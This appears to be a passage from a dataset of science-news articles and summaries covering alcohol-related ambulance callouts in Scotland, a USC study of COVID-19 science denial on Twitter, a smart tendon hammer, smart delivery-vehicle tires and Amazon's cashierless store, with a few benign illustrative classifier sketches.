areas, 10% were alcohol-related. The algorithm was found to perform very well (99% accuracy) in identifying callouts from notes when compared to the professional judgement of an experienced paramedic who reviewed complete patient records. This method also has the advantage over previous methods of being easy for SAS to apply routinely to monitor alcohol-related callouts over time. Prior methods resulted in either large underestimates or used reports from staff surveys which could not be tested for accuracy or routinely carried out. Prof Jim Lewsey, Professor of Medical Statistics, of the University of Glasgow's Institute of Health and Wellbeing, said: "We have shown that there is a high burden of alcohol on ambulance callouts in Scotland. 
This is particularly true at weekends, for callouts involving younger people and for callouts to addresses in areas with high levels of socio-economic deprivation. These data can be used to monitor trends over time and inform alcohol policy decision making both at local and national levels. Further, our methodological approach can be applied to other contexts for determining the burden of other factors to the ambulance service." Based on the average cost of an ambulance callout in 2019, researchers estimate the total cost of alcohol-related callouts at approximately £31.5 million, though the exact figure would depend on the complexity of alcohol-related call outs, compared with non-alcohol-related call outs. Importantly, this analysis did not examine how many alcohol-related callouts arose from drinking in homes or licensed premises. Prof Niamh Fitzgerald, Professor of Alcohol Policy and Director of the Institute for Social Marketing and Health at the University of Stirling is Principal Investigator for the overall study evaluating the impact of minimum unit pricing of alcohol on alcohol-related ambulance callouts in Scotland. Prof. Fitzgerald added: "As we emerge from the COVID-19 pandemic, we all want to protect NHS services for when they are most needed. It is timely therefore to consider whether it is acceptable that over 230 ambulance callouts every day are linked to alcohol when we have policy solutions that can reduce this burden. We are also conducting further research to understand what types of callouts and drinking locations give rise to these figures and how they are experienced by paramedics." Dr Jim Ward, Medical Director at the Scottish Ambulance Service (SAS) said: "This study is very welcome as it gives SAS the ability to better understand the impact alcohol has on the demand for ambulance response. Our frontline staff consistently see the serious effects unsafe levels of alcohol have on people's lives and we would urge the public to drink responsibly." The study, 'Estimating the burden of alcohol on ambulance callouts through development and validation of an algorithm using electronic patient records' is published in the International Journal of Environmental Research and Public Health. The work was funded by the Scottish Government Chief Scientist Office. Enquiries: [email protected] or [email protected] / 0141 330 6557 or 0141 330 4831 First published: 21 June 2021
227
Science Denial, Partisanship on Social Media Indicate Where COVID-19 Strikes Next
Contact: Gary Polakovic at [email protected] or [email protected] In the realm of social media, anti-science views about COVID-19 align so closely with political ideology - especially among conservatives - that its predictability offers a strategy to help protect public health, a new USC study shows. Resistance to science, including the efficacy of masks and vaccines, poses a challenge to conquering the coronavirus crisis. The goal of achieving herd immunity won't happen until society achieves consensus about science-based solutions. The USC study's machine-learning assisted analysis of social media communications offers policymakers and public health officials new tools to anticipate shifts in attitudes and proactively respond. "We show that anti-science views are aligned with political ideology, specifically conservatism," said Kristina Lerman, lead author of the study and a professor at the USC Viterbi School of Engineering. "While that's not necessarily brand new, we discovered this entirely from social media data that gives detailed clues about where COVID-19 is likely to spread so we can take preventive measures." The study was published this week in the Journal of Medical Internet Research. New study takes a different tack Previous surveys and polls have shown a partisan gulf in views about COVID-19 as well as the costs and benefits of remedies. By contrast, the USC study examined public health attitudes based on Twitter tweets between Jan. 21 and May 1, 2020. They sorted people into three groups - liberal versus conservative, pro-science versus anti-science, and hardline versus moderate - then trained machine-learning algorithms to sort all the other people. They used geographical data to pare 115 million tweets worldwide down to 27 million tweets by 2.4 million users in the United States. The researchers further parsed the data by demographics and geography and tracked it over the three-month study period. This approach allowed for near real-time monitoring of partisan and pseudo-science attitudes that could be refined in high detail aided by advanced computing techniques. What emerged is the ability to track public discourse around COVID-19 and compare it with epidemiological outcomes. For example, the researchers found that anti-science attitudes posted between January and April 2020 were high in some Mountain West and Southern states that were later hit with deadly COVID-19 surges. In addition, the researchers were able to probe specific topics important to each group: anti-science conservatives were focused on political topics, including former President Trump's reelection campaigns and QAnon conspiracies, while pro-science conservatives paid attention to global outbreaks of the virus and focused more on preventive measures to "flatten the curve." Researchers were able to track attitudes across time and geography to see how they changed. For example, to their surprise, they found that polarization on the topic of science went down over time. Perhaps most encouraging, they discovered that, even in a highly polarized population, "the number of pro-science, politically moderate users dwarfs other ideological groups, especially anti-science groups." They said their results suggest most people are ready to accept scientific evidence and trust scientists. Social media as a tool to anticipate disease outbreak The findings can also help policymakers and public health officials.
If they see anti-science sentiment growing in one region of the country, they can tailor messages to mitigate distrust of science while also preparing for a potential disease outbreak. "Now we can use social media data for science, to create spatial and temporal maps of public opinions along ideological lines, pro- and anti-science lines," said Lerman, a computer scientist and expert in mining social media for clues about human behavior at USC's Information Sciences Institute. "We can also see what topics are important to these segments of society, and we can plan proactively to prevent disease outbreaks from happening." Support for the study comes from the Air Force Office of Scientific Research (grant FA9550-20-1-0224) and the Defense Advanced Research Projects Agency (DARPA, grant W911NF-17-C-0094). The study authors are Lerman, Ashwin Rao, Fred Morstatter, Minda Hu, Emily Chen, Keith Burghardt and Emilio Ferrara of the Information Sciences Institute. The work was supported in part by the Air Force Office of Scientific Research and the Defense Advanced Research Projects Agency. Illustration credit: iStock
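Loosely analogous to the seed-and-propagate approach described above, the sketch below trains a text classifier on a few labeled examples and applies it to unlabeled posts. The seed tweets, labels, and model choice are invented placeholders; the USC team's actual features, seed sets, and models are described in their paper, not reproduced here.

    # Hedged sketch: propagate stance labels from a small seed set of users/posts.
    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.linear_model import LogisticRegression
    from sklearn.pipeline import make_pipeline

    seed_tweets = [
        "masks and vaccines work, listen to the epidemiologists",
        "flatten the curve, trust the data from public health experts",
        "covid is a hoax, the lockdowns are government control",
        "this so-called pandemic is fake news pushed by elites",
    ]
    seed_labels = ["pro-science", "pro-science", "anti-science", "anti-science"]

    model = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)), LogisticRegression())
    model.fit(seed_tweets, seed_labels)

    unlabeled = ["wear a mask indoors please", "plandemic conspiracy, wake up"]
    print(model.predict(unlabeled))

Aggregating predictions like these by state and week is what lets the resulting attitude maps be compared against later epidemiological outcomes.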
A machine learning-assisted social media analysis by researchers at the University of Southern California (USC) could help predict where COVID-19 will emerge next, based on anti-science views and political ideology. USC's Kristina Lerman said the study determined entirely from social media data that "anti-science views are aligned with political ideology, specifically conservatism." Using 27 million Twitter tweets posted by 2.4 million U.S. users from Jan. 21 to May 1, 2020, the researchers compared public discourse on COVID-19 with epidemiological outcomes. They found that anti-science attitudes were high from January through April 2020 in Mountain West and Southern states that experienced COVID-19 surges.
[]
[]
[]
scitechnews
None
None
None
None
A machine learning-assisted social media analysis by researchers at the University of Southern California (USC) could help predict where COVID-19 will emerge next, based on anti-science views and political ideology. USC's Kristina Lerman said the study determined entirely from social media data that "anti-science views are aligned with political ideology, specifically conservatism." Using 27 million Twitter tweets posted by 2.4 million U.S. users from Jan. 21 to May 1, 2020, the researchers compared public discourse on COVID-19 with epidemiological outcomes. They found that anti-science attitudes were high from January through April 2020 in Mountain West and Southern states that experienced COVID-19 surges. Contact: Gary Polakovic at [email protected] or [email protected] In the realm of social media, anti-science views about COVID-19 align so closely with political ideology - especially among conservatives - that its predictability offers a strategy to help protect public health, a new USC study shows. Resistance to science, including the efficacy of masks and vaccines, poses a challenge to conquering the coronavirus crisis. The goal of achieving herd immunity won't happen until society achieves consensus about science-based solutions. The USC study's machine-learning assisted analysis of social media communications offers policymakers and public health officials new tools to anticipate shifts in attitudes and proactively respond. "We show that anti-science views are aligned with political ideology, specifically conservatism," said Kristina Lerman, lead author of the study and a professor at the USC Viterbi School of Engineering. "While that's not necessarily brand new, we discovered this entirely from social media data that gives detailed clues about where COVID-19 is likely to spread so we can take preventive measures." The study was published this week in the Journal of Medical Internet Research. New study takes a different tack Previous surveys and polls have shown a partisan gulf in views about COVID-19 as well as the costs and benefits of remedies. By contrast, the USC study examined public health attitudes based on Twitter tweets between Jan. 21 and May 1, 2020. They sorted people into three groups - liberal versus conservative, pro-science versus anti-science, and hardline versus moderate - then trained machine-learning algorithms to sort all the other people. They used geographical data to pare 115 million tweets worldwide down to 27 million tweets by 2.4 million users in the United States. The researchers further parsed the data by demographics and geography and tracked it over the three-month study period. This approach allowed for near real-time monitoring of partisan and pseudo-science attitudes that could be refined in high detail aided by advanced computing techniques. What emerged is the ability to track public discourse around COVID-19 and compare it with epidemiological outcomes. For example, the researchers found that anti-science attitudes posted between January and April 2020 were high in some Mountain West and Southern states that were later hit with deadly COVID-19 surges. In addition, the researchers were able to probe specific topics important to each group: anti-science conservatives were focused on political topics, including former President Trump's reelection campaigns and QAnon conspiracies, while pro-science conservatives paid attention to global outbreaks of the virus and focused more on preventive measures to "flatten the curve."
Researchers were able to track attitudes across time and geography to see how they changed. For example, to their surprise, they found that polarization on the topic of science went down over time. Perhaps most encouraging, they discovered that, even in a highly polarized population, "the number of pro-science, politically moderate users dwarfs other ideological groups, especially anti-science groups." They said their results suggest most people are ready to accept scientific evidence and trust scientists. Social media as a tool to anticipate disease outbreak The findings can also help policymakers and public health officials. If they see anti-science sentiment growing in one region of the country, they can tailor messages to mitigate distrust of science while also preparing for a potential disease outbreak. "Now we can use social media data for science, to create spatial and temporal maps of public opinions along ideological lines, pro- and anti-science lines," said Lerman, a computer scientist and expert in mining social media for clues about human behavior at USC's Information Sciences Institute. "We can also see what topics are important to these segments of society, and we can plan proactively to prevent disease outbreaks from happening." Support for the study comes from the Air Force Office of Scientific Research (grant FA9550-20-1-0224) and the Defense Advanced Research Projects Agency (DARPA, grant W911NF-17-C-0094). The study authors are Lerman, Ashwin Rao, Fred Morstatter, Minda Hu, Emily Chen, Keith Burghardt and Emilio Ferrara of the Information Sciences Institute. The work was supported in part by the Air Force Office of Scientific Research and the Defense Advanced Research Projects Agency. Illustration credit: iStock
228
If I Had a Hammer: A Simple Tool to Enable Remote Neurological Examinations
In the early weeks of the COVID-19 pandemic, clinics and patients alike began cancelling all non-urgent appointments and procedures in order to slow the spread of the coronavirus. A boom in telemedicine was borne out of necessity as healthcare workers, administrators, and scientists creatively advanced technologies to fill a void in care. During this time, Georgia Institute of Technology professor Jun Ueda and Ph.D. student Waiman Meinhold, along with their collaborators at NITI-ON Co. and Tohoku University in Japan, began to explore how they might contribute. By employing their previously engineered "smart" tendon hammer and developing a mobile app to accompany it, Meinhold, Ueda, and their collaborators devised a system that enables the deep tendon reflex exam to be performed remotely, filling a gap in neurological healthcare delivery. The deep tendon reflex exam is both a basic and crucial part of neurological assessment and is often the first step in identifying neurological illnesses. The traditional exam consists of two main parts. First, using a silicone hammer, a physician taps on a patient's tendon to trigger a reflex response. Next, the physician grades the reflex on a numerical scale. To characterize the reflex, a trained physician relies primarily on previous experience, visual cues, and the "feel" of the hammer rebounding in their hand. Until now, the physical act of reflex elicitation has been completely out of reach for telemedicine. Hitting the correct spot on the tendon is crucial and is necessary in order to elicit a proper reflex response. According to Meinhold and Ueda's research, a patient's caretaker or family member may be able to easily step in to assist with this critical component of the neurological exam. They will simply need to obtain the smart tendon hammer and download the accompanying mobile application for data analysis. To make this advance possible, Meinhold and Ueda modified a standard commercially available reflex hammer by furnishing it with a small wireless Inertial Measurement Unit (IMU) capable of measuring and streaming the hammer's acceleration data. In the course of their research, Meinhold and Ueda proved that by taking the hammer's acceleration measurements from on-tendon and off-tendon locations and running them through a classification algorithm, they can reliably distinguish whether or not the hammer has hit the correct spot. How would this remote exam work, exactly? Equipped with the smart hammer, the lay person uses the app to select which tendon they will test (bicep, Achilles, patellar, etc.), which calls up the pre-programmed "classifier" for that particular tendon. These "classifiers" are basic forms of artificial intelligence that use aggregated acceleration data collected from experiments to categorize each tap into one of two categories: correct or incorrect. The lay person then uses the smart tendon hammer to administer a tap on the patient's tendon. As contact is made, the hammer streams acceleration data via Bluetooth to the app, which interprets the data and gives instant feedback to the user about whether they have tapped the correct location. In addition, colored LEDs on the hammer indicate a tap's success, with a green light indicating a correct tap and a red light indicating an incorrect tap. The user is prompted to keep tapping until they log several correct taps. Crucially, Meinhold and Ueda showed that lay people can adequately perform tendon tapping. 
Their research appeared in the peer-reviewed journal Frontiers in Robotics and AI on March 16, 2021. There, moving their smart hammer closer to clinical implementation, Meinhold and Ueda directly compared the manual tapping variability between a novice and a trained clinician. The results were reassuring. The team found that while novices had more variability in their tapping than clinicians, their skill level was adequate. They reliably elicited tendon reflexes. Their research demonstrates that a tool is within reach to allow for remote implementation of the deep tendon reflex exam. But could lay users also aid in grading reflexes? The work by Meinhold and Ueda suggests that non-experts may be able to help. To investigate this, they tested a simple training scheme. They provided participants and physicians with a training video on how to grade reflexes, and then assigned unlabeled videos for them to score. They found that while novices were able to grade reflexes with relatively low error rates, expert physicians outperformed them. Physicians excelled at grading from video, making no errors. To access this expert grading, Meinhold and Ueda envision that through the app, lay users could upload videos of the tendon tapping and reflex response. Physicians could then easily grade the patient's reflexes from their office. By revolutionizing a traditional neurological assessment procedure, the smart hammer system developed at Georgia Tech is poised to kick-start a new wave in telemedicine. Text - Catherine Barzler Images - Christa Ernst A Smart Tendon Hammer System for Remote Neurological Examination W. Meinhold, Y. Yamakawa, H. Honda, T. Mori, S. Izumi and Jun Ueda Frontiers in Robotics and AI, #8, 2021 DOI=10.3389/frobt.2021.618656
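A toy sketch of the on-tendon versus off-tendon decision follows. The simulated traces, the hand-picked features, and the SVM are stand-ins chosen for illustration; the published system classifies real IMU streams with per-tendon models trained on experimental recordings.

    # Hedged sketch: classify a tap's acceleration trace as on-tendon (correct) or not.
    import numpy as np
    from sklearn.svm import SVC

    rng = np.random.default_rng(2)

    def simulated_tap(on_tendon: bool, n: int = 200) -> np.ndarray:
        """Toy acceleration trace: a decaying impact transient, softer off-tendon."""
        t = np.linspace(0, 0.1, n)
        peak = 9.0 if on_tendon else 5.0
        return peak * np.exp(-60 * t) * np.cos(2 * np.pi * 80 * t) + 0.3 * rng.normal(size=n)

    def features(trace: np.ndarray) -> np.ndarray:
        return np.array([trace.max(), trace.min(), np.abs(trace).mean(), trace.std()])

    X = np.array([features(simulated_tap(on)) for on in [True, False] * 100])
    y = np.array([1, 0] * 100)                      # 1 = correct (on-tendon) tap

    clf = SVC(kernel="rbf").fit(X, y)
    new_tap = features(simulated_tap(True))
    print("green LED" if clf.predict([new_tap])[0] == 1 else "red LED")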
Researchers at the Georgia Institute of Technology, in collaboration with Japan's Tohoku University and NITI-ON Co., have developed a mobile app for use with their "smart" tendon hammer to allow remote deep tendon reflex exams, the first step in identifying neurological illnesses. To determine whether the hammer has hit the correct spot on the tendon to elicit a proper reflex response, the researchers added a small wireless inertial measurement unit to a standard commercially available reflex hammer. The hammer's acceleration measurements from on-tendon and off-tendon locations are run through a classification algorithm, and the patient receives instant feedback as to whether the hammer has hit the correct spot. Physicians grade patients' reflexes by reviewing videos of the tendon tapping and reflex response uploaded by the patient through the app.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Georgia Institute of Technology, in collaboration with Japan's Tohoku University and NITI-ON Co., have developed a mobile app for use with their "smart" tendon hammer to allow remote deep tendon reflex exams, the first step in identifying neurological illnesses. To determine whether the hammer has hit the correct spot on the tendon to elicit a proper reflex response, the researchers added a small wireless inertial measurement unit to a standard commercially available reflex hammer. The hammer's acceleration measurements from on-tendon and off-tendon locations are run through a classification algorithm, and the patient receives instant feedback as to whether the hammer has hit the correct spot. Physicians grade patients' reflexes by reviewing videos of the tendon tapping and reflex response uploaded by the patient through the app. In the early weeks of the COVID-19 pandemic, clinics and patients alike began cancelling all non-urgent appointments and procedures in order to slow the spread of the coronavirus. A boom in telemedicine was borne out of necessity as healthcare workers, administrators, and scientists creatively advanced technologies to fill a void in care. During this time, Georgia Institute of Technology professor Jun Ueda and Ph.D. student Waiman Meinhold, along with their collaborators at NITI-ON Co. and Tohoku University in Japan, began to explore how they might contribute. By employing their previously engineered "smart" tendon hammer and developing a mobile app to accompany it, Meinhold, Ueda, and their collaborators devised a system that enables the deep tendon reflex exam to be performed remotely, filling a gap in neurological healthcare delivery. The deep tendon reflex exam is both a basic and crucial part of neurological assessment and is often the first step in identifying neurological illnesses. The traditional exam consists of two main parts. First, using a silicone hammer, a physician taps on a patient's tendon to trigger a reflex response. Next, the physician grades the reflex on a numerical scale. To characterize the reflex, a trained physician relies primarily on previous experience, visual cues, and the "feel" of the hammer rebounding in their hand. Until now, the physical act of reflex elicitation has been completely out of reach for telemedicine. Hitting the correct spot on the tendon is crucial and is necessary in order to elicit a proper reflex response. According to Meinhold and Ueda's research, a patient's caretaker or family member may be able to easily step in to assist with this critical component of the neurological exam. They will simply need to obtain the smart tendon hammer and download the accompanying mobile application for data analysis. To make this advance possible, Meinhold and Ueda modified a standard commercially available reflex hammer by furnishing it with a small wireless Inertial Measurement Unit (IMU) capable of measuring and streaming the hammer's acceleration data. In the course of their research, Meinhold and Ueda proved that by taking the hammer's acceleration measurements from on-tendon and off-tendon locations and running them through a classification algorithm, they can reliably distinguish whether or not the hammer has hit the correct spot. How would this remote exam work, exactly? Equipped with the smart hammer, the lay person uses the app to select which tendon they will test (bicep, Achilles, patellar, etc.), which calls up the pre-programmed "classifier" for that particular tendon. 
These "classifiers" are basic forms of artificial intelligence that use aggregated acceleration data collected from experiments to categorize each tap into one of two categories: correct or incorrect. The lay person then uses the smart tendon hammer to administer a tap on the patient's tendon. As contact is made, the hammer streams acceleration data via Bluetooth to the app, which interprets the data and gives instant feedback to the user about whether they have tapped the correct location. In addition, colored LEDs on the hammer indicate a tap's success, with a green light indicating a correct tap and a red light indicating an incorrect tap. The user is prompted to keep tapping until they log several correct taps. Crucially, Meinhold and Ueda showed that lay people can adequately perform tendon tapping. Their research appeared in the peer-reviewed journal Frontiers in Robotics and AI on March 16, 2021. There, moving their smart hammer closer to clinical implementation, Meinhold and Ueda directly compared the manual tapping variability between a novice and a trained clinician. The results were reassuring. The team found that while novices had more variability in their tapping than clinicians, their skill level was adequate. They reliably elicited tendon reflexes. Their research demonstrates that a tool is within reach to allow for remote implementation of the deep tendon reflex exam. But could lay users also aid in grading reflexes? The work by Meinhold and Ueda suggests that non-experts may be able to help. To investigate this, they tested a simple training scheme. They provided participants and physicians with a training video on how to grade reflexes, and then assigned unlabeled videos for them to score. They found that while novices were able to grade reflexes with relatively low error rates, expert physicians outperformed them. Physicians excelled at grading from video, making no errors. To access this expert grading, Meinhold and Ueda envision that through the app, lay users could upload videos of the tendon tapping and reflex response. Physicians could then easily grade the patient's reflexes from their office. By revolutionizing a traditional neurological assessment procedure, the smart hammer system developed at Georgia Tech is poised to kick-start a new wave in telemedicine. Text - Catherine Barzler Images - Christa Ernst A Smart Tendon Hammer System for Remote Neurological Examination W. Meinhold, Y. Yamakawa, H. Honda, T. Mori, S. Izumi and Jun Ueda Frontiers in Robotics and AI, #8, 2021 DOI=10.3389/frobt.2021.618656
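The published paper's classifier internals are not reproduced here, so the following is only a minimal sketch of the general idea: summarize each tap's IMU acceleration trace with a few hand-picked features and train a binary on-tendon/off-tendon model. The feature choices, the synthetic taps, and the use of scikit-learn's logistic regression are assumptions for illustration, not the authors' method.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

def tap_features(accel, fs=1000.0):
    """Summarize one tap: accel is an (N, 3) array of accelerometer samples."""
    mag = np.linalg.norm(accel, axis=1)            # acceleration magnitude per sample
    peak = mag.max()
    peak_idx = int(mag.argmax())
    # samples after the impact peak that have settled below 20% of the peak
    settled = np.where(mag[peak_idx:] < 0.2 * peak)[0]
    rebound_ms = 1000.0 * (settled[0] if settled.size else mag.size - peak_idx) / fs
    energy = float(np.mean(mag ** 2))
    return np.array([peak, rebound_ms, energy])

def synth_tap(on_tendon, rng, n=200):
    """Toy data: on-tendon taps get a sharper peak and a faster rebound."""
    t = np.linspace(0.0, 0.2, n)
    peak = rng.normal(9.0 if on_tendon else 6.0, 1.0)
    decay = 30.0 if on_tendon else 12.0
    pulse = peak * np.exp(-decay * t)
    return rng.normal(0.0, 0.3, size=(n, 3)) + pulse[:, None] * np.array([0.9, 0.3, 0.3])

rng = np.random.default_rng(0)
taps = [synth_tap(True, rng) for _ in range(100)] + [synth_tap(False, rng) for _ in range(100)]
X = np.stack([tap_features(tap) for tap in taps])
y = np.array([1] * 100 + [0] * 100)                # 1 = on-tendon ("correct") tap

model = LogisticRegression(max_iter=1000).fit(X, y)
label = model.predict(tap_features(synth_tap(True, rng)).reshape(1, -1))[0]
print("green LED (correct tap)" if label == 1 else "red LED (try again)")
```

In a real system, the final prediction would simply drive the green or red LED feedback described above.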
229
Smart Tires Hit the Road
The technology is geared toward vehicles that specialize in last-mile delivery, which refers to the final step in getting packages from a distribution center to the customer. The market for last-mile delivery has picked up as online shopping has soared during the coronavirus pandemic. Goodyear's new technology, announced Wednesday, is called SightLine and includes a sensor and proprietary machine-learning algorithms that can predict flat tires or other issues days ahead of time, by measuring tire wear, pressure, road-surface conditions and many other factors. The surge of last-mile deliveries during the pandemic means that a lot of vehicles are on the road, "stopping and going, hitting curbs, causing damage to the tires, causing breakdowns and congestion," said Richard Kramer, chief executive of Akron, Ohio-based Goodyear. The last-mile delivery market is expected to grow to almost $70 billion by 2025, up from about $40 billion in 2020, according to technology research firm Gartner Inc. The volume of parcels is expected to grow to 200 billion in 2025, up from an estimated 100 billion in 2019, according to Gartner. In a pilot test with about 1,000 vehicles operated by 20 customers, including some of Amazon's delivery service partners, SightLine was able to detect 90% of their tire-related issues ahead of time, said Chris Helsel, Goodyear's senior vice president of global operations and chief technology officer. SightLine builds off sensor technology that has been in the works for several years. Goodyear already sells tires to large commercial trucking customers that can measure temperature and pressure, but the SightLine system contains more advanced technology, Mr. Helsel said, including a sensor that tracks dozens of measurements such as tire wear, inflation and road-surface conditions and a battery that detects temperature, pressure, acceleration and vibration. The system also includes a device that ingests data and communicates with Goodyear's cloud, which analyzes the data in real time using proprietary machine-learning algorithms, Mr. Helsel said. Vehicles using Goodyear's intelligent tires can shorten the stopping distance lost by wear and tear on a tire by about 30%, he said. Last-mile delivery vehicles can go through four sets of tires a year, which is highly inefficient from a cost and sustainability perspective, said Nizar Trigui, CTO at Nashville-based Bridgestone Americas, a subsidiary of Bridgestone Corp. The company, which has historically focused on customers in the long-haul trucking sector, is developing an intelligent tire system that uses sensors, AI algorithms and "digital twins," which are digital representations of physical tires on vehicles, to predict when tires will wear out on delivery vehicles and whether the tires are still in good health for retreading. Putting a new tread on a used tire that still has life in it is better for the environment than sending it to a landfill, Mr. Trigui said. Compared with new tires, retreaded tires reduce carbon emissions by 24% and reduce air pollution by 21%, according to the company. The technology is currently in the final stages of testing with last-mile delivery partners and will launch in the coming months, Mr. Trigui said. Bridgestone Americas already has several intelligent tire features available for customers in the mining and commercial trucking industries. 
Helping detect tire-related problems before they happen can lead to fewer breakdowns, less traffic congestion and increased safety for last-mile delivery drivers, said Bart De Muynck, vice president analyst at Gartner's supply chain practice. Tire manufacturers are investing more heavily in the field of telematics, which refers to the use of technology to collect and monitor data relating to a vehicle or parts of a vehicle, he said. Telematics is expected to become an important part of electric vehicles and self-driving cars in the future, to get more information about a vehicle's maintenance status, emissions and safety at any given point in time, he said. Making drivers aware of potential tire-related problems ahead of time makes good business sense, too, he said, since drivers will pay to get tires serviced. Large portions of tire makers' revenue is now coming from the services side, as people are buying fewer cars overall. "Having access to the data, not just when you make the product but when you sell it [will] allow you to serve your customers on an ongoing basis," Mr. De Muynck said. Write to Sara Castellanos at [email protected]
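Neither company has published its models, so the snippet below is only a generic sketch of the kind of trend-based alerting the article describes: fit a trend to recent telemetry and flag a tire days before it is projected to cross a wear or pressure limit. The thresholds, units, and linear extrapolation are assumptions for illustration, not SightLine's or Bridgestone's algorithms.

```python
import numpy as np

MIN_TREAD_MM = 1.6        # assumed minimum tread depth before replacement
MIN_PRESSURE_KPA = 550    # assumed low-pressure threshold for this tire spec

def days_until_limit(readings, days, limit):
    """Fit a line to recent daily readings and extrapolate to the limit crossing."""
    slope, intercept = np.polyfit(days, readings, 1)
    if slope >= 0:
        return float("inf")                    # not trending toward the limit
    return (limit - intercept) / slope - days[-1]

rng = np.random.default_rng(0)
days = np.arange(30)                                        # last 30 days of telemetry
tread = 8.0 - 0.05 * days + rng.normal(0, 0.05, 30)         # mm, slow wear
pressure = 690 - 4.0 * days + rng.normal(0, 3.0, 30)        # kPa, a slow leak

for name, series, limit in [("tread depth", tread, MIN_TREAD_MM),
                            ("pressure", pressure, MIN_PRESSURE_KPA)]:
    margin = days_until_limit(series, days, limit)
    if margin < 14:
        print(f"ALERT: {name} projected to cross its limit in about {margin:.0f} days")
    else:
        print(f"{name}: about {margin:.0f} days of margin projected")
```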
Tire manufacturers Goodyear Tire & Rubber and Bridgestone are launching new smart tire features for last-mile delivery vehicles transporting packages from e-commerce sites like Amazon.com. Goodyear's SightLine solution runs data from a sensor through proprietary machine learning algorithms to capture tire wear, pressure, road-surface conditions, and other variables to forecast flats or other problems days ahead of time. Goodyear's Chris Helsel said SightLine could detect 90% of tire-related issues ahead of time in a test that involved about 1,000 vehicles operated by 20 customers. Meanwhile, Bridgestone Americas is developing an intelligent tire system that combines sensors, artificial intelligence algorithms, and digital twins to predict tire wear and readiness for retreading.
[]
[]
[]
scitechnews
None
None
None
None
Tire manufacturers Goodyear Tire & Rubber and Bridgestone are launching new smart tire features for last-mile delivery vehicles transporting packages from e-commerce sites like Amazon.com. Goodyear's SightLine solution runs data from a sensor through proprietary machine learning algorithms to capture tire wear, pressure, road-surface conditions, and other variables to forecast flats or other problems days ahead of time. Goodyear's Chris Helsel said SightLine could detect 90% of tire-related issues ahead of time in a test that involved about 1,000 vehicles operated by 20 customers. Meanwhile, Bridgestone Americas is developing an intelligent tire system that combines sensors, artificial intelligence algorithms, and digital twins to predict tire wear and readiness for retreading. The technology is geared toward vehicles that specialize in last-mile delivery, which refers to the final step in getting packages from a distribution center to the customer. The market for last-mile delivery has picked up as online shopping has soared during the coronavirus pandemic. Goodyear's new technology, announced Wednesday, is called SightLine and includes a sensor and proprietary machine-learning algorithms that can predict flat tires or other issues days ahead of time, by measuring tire wear, pressure, road-surface conditions and many other factors. The surge of last-mile deliveries during the pandemic means that a lot of vehicles are on the road, "stopping and going, hitting curbs, causing damage to the tires, causing breakdowns and congestion," said Richard Kramer, chief executive of Akron, Ohio-based Goodyear. The last-mile delivery market is expected to grow to almost $70 billion by 2025, up from about $40 billion in 2020, according to technology research firm Gartner Inc. The volume of parcels is expected to grow to 200 billion in 2025, up from an estimated 100 billion in 2019, according to Gartner. In a pilot test with about 1,000 vehicles operated by 20 customers, including some of Amazon's delivery service partners, SightLine was able to detect 90% of their tire-related issues ahead of time, said Chris Helsel, Goodyear's senior vice president of global operations and chief technology officer. SightLine builds off sensor technology that has been in the works for several years. Goodyear already sells tires to large commercial trucking customers that can measure temperature and pressure, but the SightLine system contains more advanced technology, Mr. Helsel said, including a sensor that tracks dozens of measurements such as tire wear, inflation and road-surface conditions and a battery that detects temperature, pressure, acceleration and vibration. The system also includes a device that ingests data and communicates with Goodyear's cloud, which analyzes the data in real time using proprietary machine-learning algorithms, Mr. Helsel said. Vehicles using Goodyear's intelligent tires can shorten the stopping distance lost by wear and tear on a tire by about 30%, he said. Last-mile delivery vehicles can go through four sets of tires a year, which is highly inefficient from a cost and sustainability perspective, said Nizar Trigui, CTO at Nashville-based Bridgestone Americas, a subsidiary of Bridgestone Corp. 
The company, which has historically focused on customers in the long-haul trucking sector, is developing an intelligent tire system that uses sensors, AI algorithms and "digital twins," which are digital representations of physical tires on vehicles, to predict when tires will wear out on delivery vehicles and whether the tires are still in good health for retreading. Putting a new tread on a used tire that still has life in it is better for the environment than sending it to a landfill, Mr. Trigui said. Compared with new tires, retreaded tires reduce carbon emissions by 24% and reduce air pollution by 21%, according to the company. The technology is currently in the final stages of testing with last-mile delivery partners and will launch in the coming months, Mr. Trigui said. Bridgestone Americas already has several intelligent tire features available for customers in the mining and commercial trucking industries. Helping detect tire-related problems before they happen can lead to fewer breakdowns, less traffic congestion and increased safety for last-mile delivery drivers, said Bart De Muynck, vice president analyst at Gartner's supply chain practice. Tire manufacturers are investing more heavily in the field of telematics, which refers to the use of technology to collect and monitor data relating to a vehicle or parts of a vehicle, he said. Telematics is expected to become an important part of electric vehicles and self-driving cars in the future, to get more information about a vehicle's maintenance status, emissions and safety at any given point in time, he said. Making drivers aware of potential tire-related problems ahead of time makes good business sense, too, he said, since drivers will pay to get tires serviced. Large portions of tire makers' revenue is now coming from the services side, as people are buying fewer cars overall. "Having access to the data, not just when you make the product but when you sell it [will] allow you to serve your customers on an ongoing basis," Mr. De Muynck said. Write to Sara Castellanos at [email protected]
230
Amazon Brings Cashierless Tech to Full-Size Grocery Store
Amazon has deployed its Just Walk Out cashierless retail system in its newest Seattle-based Amazon Fresh physical grocery outlet, its first use in a full-size store. Just Walk Out utilizes cameras and sensors to log items selected by customers, eliminating the need for checkout lines; shoppers scan their phones when they enter the store, and just "walk out" after loading their basket or cart. The new store, in the Factoria neighborhood of Bellevue, WA, also will feature Amazon One, the retailer's palm-scanning ID system that recently was adopted by Whole Foods stores.
[]
[]
[]
scitechnews
None
None
None
None
Amazon has deployed its Just Walk Out cashierless retail system in its newest Seattle-based Amazon Fresh physical grocery outlet, its first use in a full-size store. Just Walk Out utilizes cameras and sensors to log items selected by customers, eliminating the need for checkout lines; shoppers scan their phones when they enter the store, and just "walk out" after loading their basket or cart. The new store, in the Factoria neighborhood of Bellevue, WA, also will feature Amazon One, the retailer's palm-scanning ID system that recently was adopted by Whole Foods stores.
231
Underwater Robot Offers Insight into Mid-Ocean 'Twilight Zone'
